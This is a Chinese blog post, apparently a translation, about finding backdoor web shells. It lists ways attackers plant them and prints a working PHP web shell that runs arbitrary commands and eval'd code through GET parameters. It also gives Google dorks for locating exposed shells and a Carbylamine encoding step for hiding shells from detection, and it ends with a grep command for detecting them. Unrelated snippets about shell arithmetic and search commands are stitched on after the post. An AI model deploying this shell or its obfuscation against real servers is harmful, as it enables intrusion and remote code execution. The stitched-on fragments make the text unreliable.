譯 查詢後門shell

2021-08-27 19:31:11 字數 2011 閱讀 8708

一些上傳web shell的方法

1. 本地檔案包含漏洞-攻擊者可以通過資料夾遍歷特性

2. 遠端命令執行或命令注入-如果**接收額外的字串,輸入的字串作為web伺服器上執行命令的引數

3. sqli-攻擊者活動web管理員的username/password後,他可以使用管理許可權來訪問管理面板,並且可以上傳後門

4. sniff

5. 暴力破解-暴力破解ftp/ssh來獲得訪問

6. 跨站指令碼

7. 社會工程

8. 遠端檔案包含

下面**執行攻擊者執行*nix命令:

<?php

if(isset($_get['shell'])) echo("".shell_exec($_get['shell']." &")."

");

if(isset($_get['php'])) echo(eval(stripcslashes($_get['php'])));

if(isset($_get['echo'])) echo($_get['echo']);

?>

儲存**為bb.php,上傳到web伺服器,我們需要在末尾新增?shell=來執行類似下面的命令

未受保護的後門可以輕鬆的由google dork找到:inurl:r57.php, intitle: magiccoder | version x70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.php等。

一些一些後門可以被發現所有有些攻擊者使用php編碼器。有乙個新的php編碼器叫carbylamine可以使c99和r57不會輕易被發現。carbylamine很簡單。[color=red]php carbylamine.php [/color]

例如,編碼bb.php,命名為encode.php:

php carbylamine.php bb.php encoded.php

[img]

encoded.php的樣品:

<?php function kjnpcp($xzk)

{$xzk=gzinflate(base64_decode($xzk));

for($i=0;$i

[color=blue][b]查詢/刪除後門[/b][/color]

[color=blue]grep -rpn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval) *(" /var/www[/color]

Shell中的算術運算 譯

儘管shell中的變數被預設地看做是string型別,而非number,但是shell本身仍然支援算術運算。主要有以下5種方式。n 6 3 echo n 6 3 declare i n 將n宣告為乙個整數 integer n 6 3 echo n 2 z 5 z expr z 1 加號 兩邊要有空格...

常用 shell 查詢

對一些經常用到的 shell 命令做簡要的總結,方便日後查閱。tcpdump命令用來儲存和記錄網路流量,即抓包工具。你可以用它來觀察網路上發生了什麼,並可用來解決各種各樣的問題,包括和網路通訊無關的問題。tcpdump 中的關鍵字主要有以下幾種 1.關於型別的關鍵字主要包括 host net por...

shell查詢命令大全

1.whereis 檔名 特點 快速,但是是模糊查詢,例如 找 whereis mysql 它會把mysql,mysql.ini,mysql.所在的目錄都找出來.一般的查詢都用這條命令.2.find name 檔名 特點 準確,但速度慢,消耗資源大,例如我想找到php.ini的準確位置,就需要用 f...